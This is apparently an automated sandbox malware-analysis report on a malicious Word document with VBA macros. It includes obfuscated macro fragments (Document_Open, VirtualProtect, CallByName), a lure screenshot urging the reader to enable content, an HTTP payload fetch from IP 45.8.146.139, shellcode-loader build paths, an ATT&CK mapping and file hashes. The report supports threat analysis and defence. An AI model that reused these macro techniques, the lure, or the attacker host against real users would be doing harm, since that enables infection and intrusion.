Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy0RhN
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://ncus.contentsync.
Source: WINWORD.EXE, 00000000.00000000.305945925.000000000D311000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.com
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.com/
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/U
Source: global trafficHTTP traffic detected: GET /fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.8.146.139Connection: Keep-Alive

System Summary

Source: Screenshot number: 4Screenshot OCR: Enable editing" button on W a the top bar, and then click "Enable content'. m" 8^- q . . ,. l!
Source: Screenshot number: 4Screenshot OCR: Enable content'. m" 8^- q . . ,. l!lll|| i i i "sm=m= O Type here to search Ki E a a g wg
Source: cnewton doc 08.11.2022.docOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: cnewton doc 08.11.2022.docOLE, VBA macro line: Set = CallByName((EF9Yq0sar_("DgrVRLL_I")), EF9Yq0sar_("kMNkamqH7"), VbGet, EF9Yq0sar_("RQeWcJp24"))
Source: cnewton doc 08.11.2022.docOLE, VBA macro line: Set = CallByName((), EF9Yq0sar_("qWfCNVnD"), VbGet, )
Source: cnewton doc 08.11.2022.docOLE, VBA macro line: Set = CallByName((), EF9Yq0sar_("Qa6ipUt"), VbGet, )
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 4160
Source: cnewton doc 08.11.2022.docOLE, VBA macro line: Private Sub Document_Open()
Source: cnewton doc 08.11.2022.docOLE indicator, VBA macros: true
Source: cnewton doc 08.11.2022.docVirustotal: Detection: 21%
Source: cnewton doc 08.11.2022.docReversingLabs: Detection: 15%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 4152
Source: cnewton doc 08.11.2022.doc.LNK.0.drLNK file: ..\..\..\..\..\Desktop\cnewton doc 08.11.2022.doc
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1220
Source: cnewton doc 08.11.2022.docOLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{DDE00C9B-9E2F-46A2-8526-4216C14B0389} - OProcSessId.dat
Source: classification engineClassification label: mal80.expl.winDOC@3/11@0/1
Source: cnewton doc 08.11.2022.docOLE document summary: title field not present or empty
Source: cnewton doc 08.11.2022.docOLE document summary: author field not present or empty
Source: cnewton doc 08.11.2022.docOLE document summary: edited time not present or 0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: cnewton doc 08.11.2022.docInitial sample: OLE zip file path = docProps/custom.xml
Source: cnewton doc 08.11.2022.docStatic file information: File size 2343230 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: P:\DocGeneratingSigning\ShellcodeDoc\DllLoaderShellcode\Build\RemoteDllLoader\Release-x32\RemoteDllLoader.pdb source: WINWORD.EXE, 00000000.00000000.348321457.000000001496F000.00000040.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.337697577.0000000014BF0000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: P:\DocGeneratingSigning\ShellcodeDoc\DllLoaderShellcode\Build\MemLoader\Release-x32\MemLoader.pdb source: WINWORD.EXE, 00000000.00000000.348321457.000000001496F000.00000040.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.337697577.0000000014BF0000.00000040.00000001.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe
Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe
File opened: C:\PROGRA~2\COMMON~1\MICROS~1\
Source: C:\Windows\SysWOW64\WerFault.exe
File opened: C:\PROGRA~2\COMMON~1\
Source: C:\Windows\SysWOW64\WerFault.exe
File opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\
Source: C:\Windows\SysWOW64\WerFault.exe
File opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\
Source: C:\Windows\SysWOW64\WerFault.exe
File opened: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\
Source: C:\Windows\SysWOW64\WerFault.exe
File opened: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7.1\
Source: WINWORD.EXE, 00000000.00000000.303139501.000000000B0EF000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.352872367.000000000B0EF000.00000004.00000001.00020000.00000000.sdmp
Binary or memory string: Hyper-V RAW
Source: WINWORD.EXE, 00000000.00000000.344345051.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.311307089.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.352795200.0000000001A30000.00000002.00000001.00040000.00000000.sdmp
Binary or memory string: Shell_TrayWnd
Source: WINWORD.EXE, 00000000.00000000.344345051.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.311307089.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.352795200.0000000001A30000.00000002.00000001.00040000.00000000.sdmp
Binary or memory string: Progman
Source: WINWORD.EXE, 00000000.00000000.344345051.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.311307089.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.352795200.0000000001A30000.00000002.00000001.00040000.00000000.sdmp
Binary or memory string: Progmanlock
Source: WINWORD.EXE, 00000000.00000000.344345051.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.311307089.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.352795200.0000000001A30000.00000002.00000001.00040000.00000000.sdmp
Binary or memory string: WProgram Manager
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | 12 Scripting | Path Interception | 2 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Non-Application Layer Protocol | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | 32 Exploitation for Client Execution | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 11 Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 2 Process Injection | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Ingress Tool Transfer | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 12 Scripting | NTDS | 2 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| cnewton doc 08.11.2022.doc | 22% | Virustotal | | Browse |
| cnewton doc 08.11.2022.doc | 15% | ReversingLabs | Script-Macro.Trojan.Amphitryon | |
| cnewton doc 08.11.2022.doc | 100% | Joe Sandbox ML | | |
No Antivirus matches
No contacted domains info
                                                                                                            high
                                                                                                            https://login.windows.net/common/oauth2/authorizeQWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.odwebp.svc.msomWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://clients.config.office.net/user/v1.0/android/policiesAE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                                high
                                                                                                                https://login.windows.net/common/oauth2/authorizeCacheWINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://login.windows.net/common/oauth2/authorizeRWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://login.windows.net/common/oauth2/authorizek27LWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://login.windows.net/common/oauth2/authorizeSWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://powerlift.acompli.netPrqLWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://lifecycle.office.comovWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://entitlement.diagnostics.office.comAE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                                          high
                                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                                            high
                                                                                                                            https://outlook.office.com/WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                                              high
                                                                                                                              https://login.windows.net/common/oauth2/authorize7ehMWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://login.windows.net/common/oauth2/authorizeMWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://storage.live.com/clientlogs/uploadlocationWINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://substrate.office.com/search/api/v1/SearchHistoryWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.o365filtering.comVbWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://login.windows.net/common/oauth2/authorize=WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://login.windows.net/common/oauth2/authorize0WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://clients.config.office.net/c2r/v1.0/InteractiveInstallationAE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://analysis.windows.net/powerbi/api/WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              high
IP:45.8.146.139
Domain:unknown
Country:Russian Federation
ASN:44676
ASN Name:VMAGE-ASRU
Malicious:false
                                                                                                                                              Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                              Analysis ID:682599
                                                                                                                                              Start date and time:2022-08-11 18:47:00 +02:00
                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 7m 5s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:light
                                                                                                                                              Sample file name:cnewton doc 08.11.2022.doc
                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                              Run name:Potential for more IOCs and behavior
                                                                                                                                              Number of analysed new started processes analysed:34
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • HDC enabled
                                                                                                                                              • GSI enabled (VBA)
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal80.expl.winDOC@3/11@0/1
                                                                                                                                              EGA Information:Failed
                                                                                                                                              HDC Information:Failed
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                              • Number of executed functions: 0
                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Found application associated with file extension: .doc
                                                                                                                                              • Adjust boot time
                                                                                                                                              • Enable AMSI
                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                              • Unable to detect Microsoft Word
                                                                                                                                              • Close Viewer
                                                                                                                                              • Corrupt sample or wrongly selected analyzer.
                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.76.141, 52.109.88.39, 52.109.76.33, 20.189.173.22
                                                                                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, europe.configsvc1.live.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
Time:18:50:39
Type:API Interceptor
Description:1x Sleep call for process: WerFault.exe modified
                                                                                                                                              No context
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):65536
                                                                                                                                              Entropy (8bit):1.6334309996142495
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:WO0TZNUH7OHSTjjKYbVrP5UFAsRJp/u7sfS274Itu:30nc7OHSTjN507RJp/u7sfX4Itu
                                                                                                                                              MD5:7823330D3A564F8BA4558D06D5292363
                                                                                                                                              SHA1:86A935AA4B758D6C68D8D9016AAB37BFCFAF4DDC
                                                                                                                                              SHA-256:9CFA5323284477A801239B70EB208AFE51CBC3F6B7F70400EA4489669EA15519
                                                                                                                                              SHA-512:A409F887002A345FAADACA4F90635E060CD999B7C767AD10B9D5A263405456B77CBA9D45EA420669ACCB68EA50D8FF3D6EB488A1B5F4E5CC9E11E701FAF99A13
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
Preview:
Version=1
EventType=APPCRASH
EventTime=133047426341754833
ReportType=2
Consent=1
UploadTime=133047426385817042
ReportStatus=524384
ReportIdentifier=275f574c-7c15-4e4d-b5ef-312220e35609
IntegratorReportIdentifier=902fc8a5-e247-4658-9572-673dab5c1e0e
Wow64Host=34404
Wow64Guest=332
NsAppName=WINWORD.EXE
OriginalFilename=WinWord.exe
AppSessionGuid=000004c4-0001-001d-f4b6-8bccedadd801
TargetAppId=W:00069598d3287916f374a839556055d0342700000000!0000404de7544598f08723ea1f13c0724aef5ac5af3
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Fri Aug 12 01:50:36 2022, 0x1205a4 type
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):313988
                                                                                                                                              Entropy (8bit):2.5850247553267334
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:WVoBIphIVMxJU8S4dIpFr04Kgbz5MPm8zjs9Exh:vIpht7Ux6IpFA4bl0m8zjQ6h
                                                                                                                                              MD5:3D9A73E636B1C1F34CB6B65BAF46BE2B
                                                                                                                                              SHA1:CDDDB8DE4B332FFAC568A020AA202DDB7DAB0731
                                                                                                                                              SHA-256:B2F74F921A0CD45FBFF72D9765510307BC0DEE132A2F3F930110640EBC5758EF
                                                                                                                                              SHA-512:DED567DD31B1241DFDA331BA6AEC3D2C1919CA3C539462F4F0CB3C4AF16DBE03A395992A15922B74D9B13E8D1CE746E28D38FB6A5ED78599924D0FA8A831A788
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8354
                                                                                                                                              Entropy (8bit):3.7070758599053892
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:Rrl7r3GLNi+J6/E6YTCSUj0gmfLSD2CpD/89b7VsfBJm:RrlsNio6c6Y2SUj0gmfLSD27uf+
                                                                                                                                              MD5:0B814D3C3621EA41B83E83B0880E5DBC
                                                                                                                                              SHA1:468C48576BA01A6BDF9D6E183D64489B1304D453
                                                                                                                                              SHA-256:747DC959C798AAF6A63F0A4D88A40EFE52055809C03EEA9FE7A75DAFE6C4C250
                                                                                                                                              SHA-512:C76894DE52F5209061D328E9ECF33D92AF526D7134DC9735C28D0EBBEBE8FF3BD0C008373ACE95B324EA20E83F1470C27C1445B9DB687BBA3CE8DF5E91A11057
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>17134</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>....<Revision>1</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>1033</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>1220</Pid>...
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4671
                                                                                                                                              Entropy (8bit):4.528605782124211
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cvIwSD8zsCJgtWI9+QWgc8sqYjSb8fm8M4JxTF7+q88H8UvFeVrd:uITfQBpgrsqYpJP9Tvord
                                                                                                                                              MD5:92A97B5F7EB8A0D067DF0FEFD81B3F72
                                                                                                                                              SHA1:A6099EF86AEE73817D1DF8FDE8EE893D7AD70D65
                                                                                                                                              SHA-256:43E152F2A6754849FC1D5525838FDBD23AA047E5570F5DF316949990004CD34E
                                                                                                                                              SHA-512:A33B55E3A413594A304A3109EE640F2BD4E7888E86B33A9F7384E5C334A4135AEDC7E94B78698AA87443E24D98B0B9739F2DFECAC6A4FEA581F8DB2EC0BAB355
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1643701" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):148061
                                                                                                                                              Entropy (8bit):5.358162672109645
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:fcQW/gxgB5BQguwN/Q9DQe+zQTk4F77nXmvid3XxVETLKz61:e1Q9DQe+zuXYr
                                                                                                                                              MD5:1143367FAE88FC7686F3EAC21A38B19D
                                                                                                                                              SHA1:3B2DA22F514C7333983B8FDD501EFF3CA489C181
                                                                                                                                              SHA-256:65A50C37FEAB01B1CC298E37678A600DBD38D17953D5A4426385AEDC68FAA88A
                                                                                                                                              SHA-512:66C763003B754C5F00B595AB1FF232FC2028CDD71AB32EBDFDF8CE8BDB22E658273ADBCE4A7BB741CB65288C387979932627D36EF87248696C5E150602998D96
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-08-11T16:49:49">.. Build: 16.0.15607.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):201
                                                                                                                                              Entropy (8bit):5.120826232488609
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3LZKCezocKqD:J0+oxBeRmR9etdzRxLFez1T
                                                                                                                                              MD5:33A7649A487B43D650E4D478C96E4588
                                                                                                                                              SHA1:F10EA1CC461B73EEE86CBE992CC4724F7B4C5175
                                                                                                                                              SHA-256:469501F44D054081AD49D1D0AB0B8031ECCE6986D17D346CC39DFB7BCF327F76
                                                                                                                                              SHA-512:24CDCCA259970B669949BD197AA55FD6E05D91B53A05984D3EBB3B219B6D26BDD67165967F1C8960D55E517D7AC46E1E515DD6E5C45DE4923F2FB1B1A98BCF22
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              IE Cache URL:http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
                                                                                                                                              Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "-f" was not found on this server.</p>.</body></html>.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):201
                                                                                                                                              Entropy (8bit):5.120826232488609
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3LZKCezocKqD:J0+oxBeRmR9etdzRxLFez1T
                                                                                                                                              MD5:33A7649A487B43D650E4D478C96E4588
                                                                                                                                              SHA1:F10EA1CC461B73EEE86CBE992CC4724F7B4C5175
                                                                                                                                              SHA-256:469501F44D054081AD49D1D0AB0B8031ECCE6986D17D346CC39DFB7BCF327F76
                                                                                                                                              SHA-512:24CDCCA259970B669949BD197AA55FD6E05D91B53A05984D3EBB3B219B6D26BDD67165967F1C8960D55E517D7AC46E1E515DD6E5C45DE4923F2FB1B1A98BCF22
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "-f" was not found on this server.</p>.</body></html>.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
